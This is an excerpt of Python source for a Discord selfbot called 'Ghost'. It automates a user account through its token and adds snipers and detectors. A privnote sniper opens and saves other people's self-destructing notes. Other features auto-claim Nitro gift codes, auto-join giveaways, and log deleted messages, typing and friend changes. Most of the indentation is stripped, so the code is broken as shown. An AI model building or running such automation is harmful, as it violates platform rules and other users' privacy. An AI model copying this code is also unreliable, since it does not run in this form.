print_important("If you notice any bugs please report them to the developer.")
print(" ")
elif "dev" in version.lower():
print_important("You're currently using a developer build of Ghost.")
print_important("If you notice any bugs please report them to the developer.")
print(" ")
if not os.path.isfile('data/logins.txt'):
message = "1"
message_bytes = message.encode('ascii')
base64_bytes = base64.b64encode(message_bytes)
base64_message = base64_bytes.decode('ascii')
f = open('data/logins.txt', "w")
f.write(base64_message)
f.close()
else:
f = open('data/logins.txt', "r")
loginsdata = f.read()
base64_message = loginsdata
base64_bytes = base64_message.encode('ascii')
message_bytes = base64.b64decode(base64_bytes)
message = message_bytes.decode('ascii')
logindata = int(message)+1
logindata_str = str(logindata)
logindata_bytes = logindata_str.encode('ascii')
base64_bytes = base64.b64encode(logindata_bytes)
base64_logindata = base64_bytes.decode('ascii')
f = open('data/logins.txt', "w")
f.write(f"{base64_logindata}")
f.close()
print_info(f"Ghost can now be used with {Ghost.command_prefix} prefix.")
send_notification("Ghost", "Successfully connected!", 10)
global __ghostloaded__
__ghostloaded__ = True
if Config.getConfig()["sounds"]:
if str(sounddevice.query_devices()) != "":
pygame.mixer.music.load(resource_path("sounds/connected.mp3"))
pygame.mixer.music.play(1)
if json.load(open("richpresence.json"))["enabled"] == True:
def readyCallback(current_user):
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cBlue}[RPC] {fg.cWhite}Discord rich presence has been enabled.")
def disconnectedCallback(codeno, codemsg):
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cBlue}[RPC] {fg.cWhite}Discord rich presence has been disabled.")
def errorCallback(errno, errmsg):
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cBlue}[RPC] {fg.cWhite}An error happend.")
callbacks = {'ready': readyCallback,'disconnected': disconnectedCallback,'error': errorCallback}
discord_rpc.initialize(str(json.load(open("richpresence.json"))["client_id"]), callbacks=callbacks, log=False)
for i in range(10):
discord_rpc.update_presence(**{
'details': json.load(open("richpresence.json"))["details"].replace("{version}", version),
'state': json.load(open("richpresence.json"))["state"].replace("{version}", version),
'start_timestamp': time.time(),
'large_image_key': json.load(open("richpresence.json"))["large_image_key"],
'large_image_text': json.load(open("richpresence.json"))["large_image_text"],
'small_image_key': json.load(open("richpresence.json"))["small_image_key"],
'small_image_text': json.load(open("richpresence.json"))["small_image_text"]
})
discord_rpc.update_connection()
await asyncio.sleep(2)
discord_rpc.run_callbacks()
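# Look up a message by ID by walking the whole channel history (slow in large channels)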
async def get_message(ctx, id):
    channelMsgHistory = await ctx.channel.history(limit=999999999).flatten()
    for message in channelMsgHistory:
        if message.id == id:
            return message
    return None
@Ghost.event
async def on_error(event):
logging.error(str(event))
@Ghost.event
async def on_command(ctx):
try:
await ctx.message.delete()
except:
pass
print_cmd(f"{ctx.command.name}")
@Ghost.event
async def on_command_error(ctx, error):
logging.error(str(error))
if isinstance(error, commands.CommandNotFound):
try:
await ctx.message.delete()
except:
pass
else:
print_error(f"{error}")
try:
await ctx.message.delete()
except:
pass
@Ghost.event
async def on_message_delete(message):
if __ghostloaded__:
if Config.getConfig()["detections"]["deletedmessages"]:
if message.guild.id not in __ignoredservers__["deletedmessages"]:
print_detect("Deleted Message")
print_sniper_info("Content", message.content)
print_sniper_info("Author", str(message.author))
try:
print_sniper_info("Channel", str(message.channel))
except:
pass
try:
print_sniper_info("Guild", str(message.guild.name))
except:
pass
if Config.getConfig()["detections"]["ghostping"]:
if Ghost.user.mentioned_in(message):
if message.guild.id not in __ignoredservers__["ghostpings"]:
print_detect("Ghost Ping")
print_sniper_info("Content", str(message.content))
print_sniper_info("Author", str(message.author))
try:
print_sniper_info("Channel", str(message.channel))
except:
pass
try:
print_sniper_info("Guild", str(message.guild.name))
except:
pass
if Config.getConfig()["sounds"]:
if str(sounddevice.query_devices()) != "":
pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
pygame.mixer.music.play(1)
send_notification("Ghost Ping", f"You were ghost pinged in {message.guild} by {message.author}.", 10)
if __ghostpingwebhook__ != "":
webhook = DiscordWebhook(url=__ghostpingwebhook__)
embed = DiscordEmbed(title='Ghost Ping', color=__embedcolourraw__[1:], description=f"`{message.author}` ghost pinged you in `{message.channel}` (`{message.guild}`)")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
webhook.add_embed(embed)
response = webhook.execute()
@Ghost.event
async def on_member_ban(guild, user):
if __ghostloaded__:
if Config.getConfig()["detections"]["bans"]:
if guild.id not in __ignoredservers__["bans"]:
print_detect("Banned")
print_sniper_info("Member", f"{user}")
print_sniper_info("Member ID", f"{user.id}")
print_sniper_info("Guild", f"{guild.name}")
if str(Ghost.user) == str(user):
if Config.getConfig()["sounds"]:
if str(sounddevice.query_devices()) != "":
pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
pygame.mixer.music.play(1)
send_notification("Ban Detect", f"You were banned in {guild.name}.", 10)
@Ghost.event
async def on_guild_remove(guild):
if __ghostloaded__:
if Config.getConfig()["detections"]["guildleave"]:
if guild.id not in __guildleaveignoredservers__:
print_detect("Guild Left")
print_sniper_info("Name", guild.name)
print_sniper_info("ID", guild.id)
print_sniper_info("Owner", guild.owner)
if __guildleavewebhook__ != "":
webhook = DiscordWebhook(url=__guildleavewebhook__)
embed = DiscordEmbed(title='Guild Leave Detection', color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
embed.add_embed_field(name='Name', value=str(guild.name), inline=False)
embed.add_embed_field(name='ID', value=str(guild.id), inline=False)
embed.add_embed_field(name='Owner', value=str(guild.owner), inline=False)
webhook.add_embed(embed)
response = webhook.execute()
@Ghost.event
async def on_webhooks_update(channel):
if __ghostloaded__:
if Config.getConfig()["detections"]["webhookmodification"]:
if channel.guild.id not in __ignoredservers__["webhookmodifications"]:
print_detect("Webhook Modification")
try:
print_sniper_info("Server", channel.guild.name)
except:
pass
try:
print_sniper_info("Channel", channel.name)
except:
pass
@Ghost.event
async def on_relationship_add(relationship):
if __ghostloaded__:
if Config.getConfig()["detections"]["friendsupdate"]:
            if relationship.type == discord.RelationshipType.incoming_request:
print_detect("Incoming Friend Request")
print_sniper_info("User", relationship.user.name + "#" + relationship.user.discriminator)
print_sniper_info("ID", relationship.user.id)
if __friendsupdatewebhook__ != "":
webhook = DiscordWebhook(url=__friendsupdatewebhook__)
embed = DiscordEmbed(title='Incoming Friend Request', color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
embed.add_embed_field(name='User', value=relationship.user.name + "#" + relationship.user.discriminator, inline=False)
embed.add_embed_field(name='ID', value=str(relationship.user.id), inline=False)
webhook.add_embed(embed)
response = webhook.execute()
            if relationship.type == discord.RelationshipType.friend:
print_detect("New Friend")
print_sniper_info("User", relationship.user.name + "#" + relationship.user.discriminator)
print_sniper_info("ID", relationship.user.id)
if __friendsupdatewebhook__ != "":
webhook = DiscordWebhook(url=__friendsupdatewebhook__)
                    embed = DiscordEmbed(title='New Friend', color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
embed.add_embed_field(name='User', value=relationship.user.name + "#" + relationship.user.discriminator, inline=False)
embed.add_embed_field(name='ID', value=str(relationship.user.id), inline=False)
webhook.add_embed(embed)
response = webhook.execute()
@Ghost.event
async def on_relationship_remove(relationship):
if __ghostloaded__:
if Config.getConfig()["detections"]["friendsupdate"]:
            if relationship.type == discord.RelationshipType.outgoing_request:
print_detect("Outgoing Friend Request")
print_sniper_info("User", relationship.user.name + "#" + relationship.user.discriminator)
print_sniper_info("ID", relationship.user.id)
if __friendsupdatewebhook__ != "":
webhook = DiscordWebhook(url=__friendsupdatewebhook__)
embed = DiscordEmbed(title='Outgoing Friend Request', color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
embed.add_embed_field(name='User', value=relationship.user.name + "#" + relationship.user.discriminator, inline=False)
embed.add_embed_field(name='ID', value=str(relationship.user.id), inline=False)
webhook.add_embed(embed)
response = webhook.execute()
            if relationship.type == discord.RelationshipType.blocked:
print_detect("Blocked User")
print_sniper_info("User", relationship.user.name + "#" + relationship.user.discriminator)
print_sniper_info("ID", relationship.user.id)
if __friendsupdatewebhook__ != "":
webhook = DiscordWebhook(url=__friendsupdatewebhook__)
embed = DiscordEmbed(title='Blocked User', color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
embed.add_embed_field(name='User', value=relationship.user.name + "#" + relationship.user.discriminator, inline=False)
embed.add_embed_field(name='ID', value=str(relationship.user.id), inline=False)
webhook.add_embed(embed)
response = webhook.execute()
            if relationship.type == discord.RelationshipType.friend:
print_detect("Removed Friend")
print_sniper_info("User", relationship.user.name + "#" + relationship.user.discriminator)
print_sniper_info("ID", relationship.user.id)
if __friendsupdatewebhook__ != "":
webhook = DiscordWebhook(url=__friendsupdatewebhook__)
embed = DiscordEmbed(title='Removed Friend', color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
embed.add_embed_field(name='User', value=relationship.user.name + "#" + relationship.user.discriminator, inline=False)
embed.add_embed_field(name='ID', value=str(relationship.user.id), inline=False)
webhook.add_embed(embed)
response = webhook.execute()
@Ghost.event
async def on_typing(channel, user, when):
global typinghistory
if __ghostloaded__:
if isinstance(channel, discord.DMChannel):
current_time = when
userid = int(user.id)
if userid not in typinghistory:
typinghistory[userid] = current_time
timedif = (current_time - typinghistory[userid]).total_seconds()
if timedif >= 120 or timedif == 0:
typinghistory[userid] = current_time
if Config.getConfig()["detections"]["dmtyping"]:
print_detect(f"DM Typing")
print_sniper_info("User", user)
if Config.getConfig()["sounds"]:
if str(sounddevice.query_devices()) != "":
pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
pygame.mixer.music.play(1)
send_notification("DM Typing", f"{user} is typing in their DMs.", 10)
if __dmtypingwebhook__ != "":
webhook = DiscordWebhook(url=__dmtypingwebhook__)
embed = DiscordEmbed(title='DM Typing', color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
embed.add_embed_field(name='User', value=str(user), inline=False)
embed.add_embed_field(name='ID', value=str(user.id), inline=False)
embed.add_embed_field(name='When', value=str(when), inline=False)
webhook.add_embed(embed)
response = webhook.execute()
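# Ticket sniper: alert when a newly created channel with "ticket" in its name is visible to this account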
@Ghost.event
async def on_guild_channel_create(channel):
if __ghostloaded__:
if Config.getConfig()["snipers"]["tickets"]:
if "ticket" in channel.name:
if channel.guild.id not in __ignoredservers__["tickets"]:
if str(channel.type).lower() != "category":
request = requests.get(f"https://discord.com/api/channels/{channel.id}", headers={"Authorization": __token__, "User-Agent": get_random_user_agent()})
if request.status_code == 200:
print_sniper("Ticket")
try:
print_sniper_info("Server", channel.guild.name)
except:
pass
try:
print_sniper_info("Channel", channel.name)
except:
pass
if Config.getConfig()["sounds"]:
if str(sounddevice.query_devices()) != "":
pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
pygame.mixer.music.play(1)
send_notification("Ticket Sniper", f"{channel.name} was created in {channel.guild.name}.", 10)
if __ticketswebhook__ != "":
webhook = DiscordWebhook(url=__ticketswebhook__)
embed = DiscordEmbed(title='Ticket', color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
try:
embed.add_embed_field(name='Server', value=str(channel.guild.name), inline=False)
except:
pass
try:
embed.add_embed_field(name='Channel', value=str(channel.name), inline=False)
except:
pass
webhook.add_embed(embed)
response = webhook.execute()
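# on_message: AFK auto-reply, nitro/privnote/giveaway snipers, selfbot detection, custom commands and uwuify, then normal command processing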
@Ghost.event
async def on_message(message):
if __ghostloaded__:
messageSendTime = datetime.now()
if message.author.id != Ghost.user.id:
if afkMode:
if isinstance(message.channel, discord.DMChannel):
await message.channel.send(CONFIG["afkmode"]["replymessage"])
if Config.getConfig()["snipers"]["nitro"]:
if "discord.gift/" in message.content:
if message.guild.id not in __ignoredservers__["nitro"]:
giftLink = ""
code = ""
for item in message.content.split(" "):
if "discord.gift/" in item:
giftLink = item
code = giftLink.replace("discord.gift/", "")
print_sniper("Nitro")
print_sniper_info("Link", giftLink)
print_sniper_info("Author", message.author)
try:
print_sniper_info("Server", message.guild.name)
except:
pass
try:
print_sniper_info("Channel", message.channel.name)
except:
pass
nitroStatus = claim_nitro(code, __token__)
print_sniper_info("Status", nitroStatus)
print_sniper_info("Snipe Speed", str((datetime.now()-messageSendTime).total_seconds()) + "s")
if __nitrowebhook__ != "":
webhook = DiscordWebhook(url=__nitrowebhook__)
embed = DiscordEmbed(title='Nitro Sniper', color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
embed.add_embed_field(name='Author', value=str(message.author), inline=False)
embed.add_embed_field(name='Gift Link', value=giftLink, inline=False)
embed.add_embed_field(name='Nitro Status', value=nitroStatus, inline=False)
embed.add_embed_field(name='Jump to message', value=f"[Click Here!]({message.jump_url})", inline=False)
webhook.add_embed(embed)
response = webhook.execute()
if nitroStatus == "Valid Code":
if Config.getConfig()["sounds"]:
if str(sounddevice.query_devices()) != "":
pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
pygame.mixer.music.play(1)
send_notification("Nitro Sniper", "Sniped a nitro gift code!", 10)
if Config.getConfig()["snipers"]["privnote"]:
if "privnote.com/" in message.content:
if message.guild.id not in __ignoredservers__["privnote"]:
privnoteLink = ""
fid = datetime.now().strftime("%m_%d_%Y-%H_%M_%S")
for item in message.content.split(" "):
if "privnote.com/" in item:
privnoteLink = item
print_sniper("Privnote")
print_sniper_info("Link", privnoteLink)
print_sniper_info("Author", message.author)
try:
print_sniper_info("Server", message.guild.name)
except:
pass
try:
print_sniper_info("Channel", message.channel.name)
except:
pass
try:
content = read_privnote(privnoteLink)
file = open(f"privnote-saves/{fid}.txt", "w")
file.write(f"Privnote sent by {message.author} in #{message.channel.name}, {message.guild.name}.\nSniped at {fid}.\n \n{content}")
file.close()
print_sniper_info("Content", content)
if Config.getConfig()["sounds"]:
if str(sounddevice.query_devices()) != "":
pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
pygame.mixer.music.play(1)
send_notification("Privnote Sniper", "Sniped a privnote note!", 10)
except:
print_sniper_info("Failed", "Note already been read.")
print_sniper_info("Snipe Speed", str((datetime.now()-messageSendTime).total_seconds()) + "s")
if __privnotewebhook__ != "":
webhook = DiscordWebhook(url=__privnotewebhook__)
embed = DiscordEmbed(title='Privnote Sniper', color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
embed.add_embed_field(name='Author', value=str(message.author), inline=False)
embed.add_embed_field(name='Privnote Link', value=privnoteLink, inline=False)
try:
embed.add_embed_field(name='Content', value=content, inline=False)
except:
                                embed.add_embed_field(name='Failed', value="Note has already been read.", inline=False)
embed.add_embed_field(name='Jump to message', value=f"[Click Here!]({message.jump_url})", inline=False)
webhook.add_embed(embed)
response = webhook.execute()
if Config.getConfig()["snipers"]["giveaway"]:
if message.embeds:
messageEmbed = discord.Embed.to_dict(message.embeds[0])
if int(message.author.id) in giveawayBots and message.author.bot:
isGiveaway = False
if "giveaway" in message.content.lower() or "giveaway" in json.dumps(messageEmbed).lower():
isGiveaway = True
if isGiveaway:
if message.guild.id not in __ignoredservers__["giveaways"]:
embed = message.embeds[0].to_dict()
prize = embed["author"]["name"]
if "ban" in prize.lower() or "kick" in prize.lower() or "mute" in prize.lower() or "punish" in prize.lower():
print_sniper("Giveaway")
print_sniper_info("Prize", prize)
print_sniper_info("Skipped", "Sus prize.")
try:
print_sniper_info("Server", message.guild.name)
except:
pass
try:
print_sniper_info("Channel", message.channel.name)
except:
pass
if Config.getConfig()["sounds"]:
if str(sounddevice.query_devices()) != "":
pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
pygame.mixer.music.play(1)
send_notification("Giveaway Sniper", f"Giveaway skipped because of sus prize.", 10)
else:
print_sniper("Giveaway")
print_sniper_info("Prize", prize)
try:
print_sniper_info("Server", message.guild.name)
except:
pass
try:
print_sniper_info("Channel", message.channel.name)
except:
pass
if __giveawaywebhook__ != "":
webhook = DiscordWebhook(url=__giveawaywebhook__)
embed = DiscordEmbed(title='Giveaway Sniper', description=f"Sniped a giveaway for `{prize}` in `{message.guild.name}`.", color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
webhook.add_embed(embed)
response = webhook.execute()
# if __giveawaysniperui__ == True:
# def giveawayGUI():
# giveawayUi = tkinter.Tk()
# giveawayUi.attributes('-topmost', True)
# def addReactionForGiveaway():
# requests.put(f"https://discord.com/api/channels/{message.channel.id}/messages/{message.id}/reactions/%F0%9F%8E%89/@me", headers={"Authorization": __token__, "User-Agent": get_random_user_agent()})
# def closeGui():
# giveawayUi.destroy()
# def joinGiveaway():
# print(f"{printSpaces} {fg.cYellow}Joined giveaway!")
# addReactionForGiveaway()
# closeGui()
# giveawayUi.wm_title("Giveaway UI")
# windowWidth = giveawayUi.winfo_reqwidth()
# windowHeight = giveawayUi.winfo_reqheight()
# positionRight = int(giveawayUi.winfo_screenwidth()/2 - windowWidth/2)
# positionDown = int(giveawayUi.winfo_screenheight()/2 - windowHeight/2)
# giveawayUi.geometry("+{}+{}".format(positionRight, positionDown))
# tkinter.Label(giveawayUi, text=" ").pack()
# mainLabel = tkinter.Label(giveawayUi, text="Would you like to join a giveaway for").pack()
# prizeLabel = tkinter.Label(giveawayUi, text=prize).pack()
# tkinter.Label(giveawayUi, text=" ").pack()
# joinBtn = tkinter.Button(giveawayUi, text="Join", command=joinGiveaway, width=15, height=2, bg="green", fg="white").pack(side=tkinter.constants.LEFT)
# cancelBtn = tkinter.Button(giveawayUi, text="Cancel", command=closeGui, width=15, height=2, bg="red", fg="white").pack(side=tkinter.constants.LEFT)
# giveawayUi.mainloop()
# giveawayGUI()
# if Config.getConfig()["sounds"]:
# if str(sounddevice.query_devices()) != "":
# pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
# pygame.mixer.music.play(1)
# send_notification("Giveaway Sniper", f"Sniped a giveaway for {prize}.", 10)
# if __giveawaywebhook__ != "":
# webhook = DiscordWebhook(url=__giveawaywebhook__)
# embed = DiscordEmbed(title='Giveaway Sniper', description=f"Joined a giveaway for `{prize}` after pressing join in Giveaway UI.", color=__embedcolourraw__[1:])
# embed.set_thumbnail(url=__embedimage__)
# embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
# embed.set_timestamp()
# embed.add_embed_field(name='Prize', value=prize, inline=False)
# embed.add_embed_field(name='Joined After', value=f"Pressing join in Giveaway UI.", inline=False)
# embed.add_embed_field(name='Jump to message', value=f"[Click Here!]({message.jump_url})", inline=False)
# webhook.add_embed(embed)
# response = webhook.execute()
# else:
                                    if Config.getConfig()["sounds"]:
                                        if str(sounddevice.query_devices()) != "":
                                            pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
                                            pygame.mixer.music.play(1)
                                    send_notification("Giveaway Sniper", f"Sniped a giveaway for {prize}.", 10)
await asyncio.sleep(__giveawayjoindelay__)
emoji = GIVEAWAYBOTS[str(message.author.id)]
await message.add_reaction(emoji)
if __giveawaywebhook__ != "":
webhook = DiscordWebhook(url=__giveawaywebhook__)
embed = DiscordEmbed(title='Giveaway Sniper', description=f"Joined a giveaway for `{prize}` after `{__giveawayjoindelay__}` seconds.", color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
webhook.add_embed(embed)
response = webhook.execute()
print_sniper("Giveaway")
print_sniper_info("Prize", prize)
try:
print_sniper_info("Server", message.guild.name)
except:
pass
try:
print_sniper_info("Channel", message.channel.name)
except:
pass
print_sniper_info("Joined after", f"{__giveawayjoindelay__} seconds.")
send_notification("Giveaway Sniper", f"Joined a giveaway for {prize}.", 10)
                                    if Config.getConfig()["sounds"]:
                                        if str(sounddevice.query_devices()) != "":
                                            pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
                                            pygame.mixer.music.play(1)
# if "congratulations" in message.content.lower():
# if f"<@{Ghost.user.id}>" in message.content.lower():
# prize = message.content.split("!")[1].split("**")[1]
# print_sniper("Giveaway")
# print(f" {fg.cYellow}You won!!!")
# print_sniper_info("Prize", prize)
# try:
# print_sniper_info("Server", message.guild.name)
# except:
# pass
# try:
# print_sniper_info("Channel", message.channel.name)
# except:
# pass
# if __giveawaywebhook__ != "":
# webhook = DiscordWebhook(url=__giveawaywebhook__)
# embed = DiscordEmbed(title='Giveaway Sniper', description=f"You won a giveaway for `{prize}`!", color=__embedcolourraw__[1:])
# embed.set_thumbnail(url=__embedimage__)
# embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
# embed.set_timestamp()
# webhook.add_embed(embed)
# response = webhook.execute()
# send_notification("Giveaway Sniper", f"You won a giveaway for {prize} 🎉!", 10)
# if Config.getConfig()["sounds"]:
# if str(sounddevice.query_devices()) != "":
# pygame.mixer.music.load(resource_path("sounds/giveaway-win.mp3"))
# pygame.mixer.music.play(1)
if Config.getConfig()["detections"]["selfbot"]:
if not message.author.bot:
if message.embeds:
if "http" not in message.content:
if message.guild.id not in __ignoredservers__["selfbots"]:
print_detect("Selfbot")
print_sniper_info("Author", message.author)
try:
print_sniper_info("Server", message.guild.name)
except:
pass
try:
print_sniper_info("Channel", message.channel.name)
except:
pass
print_sniper_info("Reason", "Sent an embedded message.")
if __selfbotwebhook__ != "":
webhook = DiscordWebhook(url=__selfbotwebhook__)
embed = DiscordEmbed(title='Selfbot', color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
embed.add_embed_field(name='Author', value=str(message.author), inline=False)
try:
embed.add_embed_field(name='Server', value=str(message.guild.name), inline=False)
except:
pass
try:
embed.add_embed_field(name='Channel', value=str(message.channel.name), inline=False)
except:
pass
embed.add_embed_field(name='Reason', value="Sent an embedded message.", inline=False)
webhook.add_embed(embed)
response = webhook.execute()
if message.author.id == Ghost.user.id:
ccmd = json.load(open("customcommands.json"))
for key in ccmd:
cmd = key
response = ccmd[key]
if message.content == f"{__prefix__}{cmd}":
print_cmd(f"{cmd}")
try:
await message.delete()
except:
pass
response = response.replace("{currenttime}", str(datetime.now().strftime("%H:%M:%S")))
response = response.replace("{currentdate}", str(datetime.now().strftime("%d/%m/%Y")))
response = response.replace("{version}", str(version))
response = response.replace("{prefix}", str(__prefix__))
response = response.replace("{theme}", str(__theme__))
response = response.replace("{randomint}", str(random.randint(1000, 9999)))
response = response.replace("{randomstring}", str(''.join(random.choice(string.ascii_letters) for i in range(8))))
await message.channel.send(response)
            if uwuifyEnabled:
                if not message.content or not message.content.startswith(__prefix__):
                    uwuedMessage = uwuify.uwu(message.content)
                    await message.edit(content=uwuedMessage)
#print(str(message.author) + " : " + str(message.content))
await Ghost.process_commands(message)
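# Load every custom script from the scripts/ directory so its commands are registered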
for filename in os.listdir('scripts/'):
if filename.endswith('.py'):
include(f'scripts/{filename}')
@Ghost.command(name="yes", description="yes", usage="yes", aliases=["ja", "po", "አዎ", "نعم", "այո", "bəli", "bai", "так", "হ্যাঁ", "da", "да", "sí", "oo", "inde", "是的", "Iè", "Ano", "jes", "jah", "Joo", "Oui", "si", "დიახ", "Ναί", "હા", "wi", "iya", "ae", "כן", "हां", "yog", "Igen", "Já", "Ya", "tá", "sì", "はい", "ya wis", "ಹೌದು", "иә", "បាទ", "yego", "네", "Erê", "Ооба", "ແມ່ນແລ້ວ", "sic", "Jā", "taip", "jo", "ENY", "ya", "അതെ", "iva", "āe", "होय", "тиймээ", "ဟုတ်တယ်", "हो", "ହଁ", "هو", "آره", "tak", "sim", "ਹਾਂ", "ioe", "tha", "ho joalo", "Ehe", "ها", "ඔව්", "Áno", "haa", "enya", "ndio", "бале", "ஆம்", "әйе", "అవును", "ใช่", "Evet", "hawa", "جی ہاں", "ھەئە", "ha", "Đúng", "oes", "Ewe", "יאָ", "beeni", "yebo", ])
async def yes(ctx):
await ctx.send("<https://www.youtube.com/watch?v=BBJa32lCaaY>")
@Ghost.command(name="scripts", description="Display all custom scripts.", usage="scripts", aliases=["customscripts", "userscripts"])
async def scripts(ctx):
    totalscripts = 0
    text = ""
    for script in os.listdir('scripts/'):
        if script.endswith('.py'):
            totalscripts += 1
            text += f"{script.replace('.py', '')}\n"
if __embedmode__:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", description=f"Found {totalscripts} custom scripts", color=__embedcolour__)
embed.add_field(name="Scripts", value=text)
embed.set_author(name="Custom Scripts")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Custom Scripts ]
Found {totalscripts} custom scripts
{text}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="customcommands", description="Display all custom commands.", usage="customcommands", aliases=["ccmds", "usercommands", "ucmds"])
async def customcommands(ctx):
    ccmd = json.load(open("customcommands.json"))
    totalcmds = len(ccmd)
ccmd2 = ""
for key in ccmd:
cmd = key
ccmd2 = ccmd2 + f"{__prefix__}{cmd}\n"
if __embedmode__:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"Found {totalcmds} custom commands.")
embed.add_field(name="Commands", value=ccmd2)
embed.set_author(name="Custom Commands")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Custom Commands ]
Found {totalcmds} custom commands.
{ccmd2}
{__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="allcmds", description="Print a list of all the commands.", usage="allcmds", aliases=["features"])
async def allcmds(ctx):
await ctx.message.delete()
content = ""
totalCommands = len(Ghost.commands)
for command in Ghost.commands:
content += f"{command.usage} : {command.description}\n"
file = open("data/features.txt", "w")
file.write(f"[All Commands]\nTotal Commands: {totalCommands}\n \n" + content)
file.close()
if __embedmode__:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", description=f"These are all the commands", color=__embedcolour__)
embed.add_field(name="Commands", value="https://github.com/GhostSelfbot/Ghost/blob/dev/features.txt")
embed.set_author(name="All Ghost Commands")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("https://github.com/GhostSelfbot/Ghost/blob/dev/features.txt")
@Ghost.command(name="search", description="Search for commands.", usage="search [term]", aliases=["find", "searchcommand"])
async def search(ctx, *, command = None):
if command is None:
if __embedmode__:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description="Please enter a command to search for.")
embed.set_author(name="Search")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_image(url=__embedlargeimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Search ]
Please enter a command to search for.
# {__embedfooter__}
```""", delete_after=__deletetimeout__)
else:
text = ""
text2 = ""
searchedItems = 0
for cmd in Ghost.commands:
if command in cmd.name or command in cmd.description or command in cmd.aliases:
searchedItems += 1
text += f"`{Ghost.command_prefix}`**{cmd.usage}** » {cmd.description}\n"
text2 += f"{Ghost.command_prefix}{cmd.usage} » {cmd.description}\n"
try:
if __embedmode__:
embed = discord.Embed(title=f"Search results...", description=f"Found `{searchedItems}` items for `{command}`.\n\n{text}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_image(url=__embedlargeimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Searched for {command} ]
{text2}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
except:
if __embedmode__:
embed = discord.Embed(title=f"Check console for search results", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_image(url=__embedlargeimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Check console for search results ]
# {__embedfooter__}```""", delete_after=__deletetimeout__)
print(f"[ Search results for {command} ]\n{text2}")
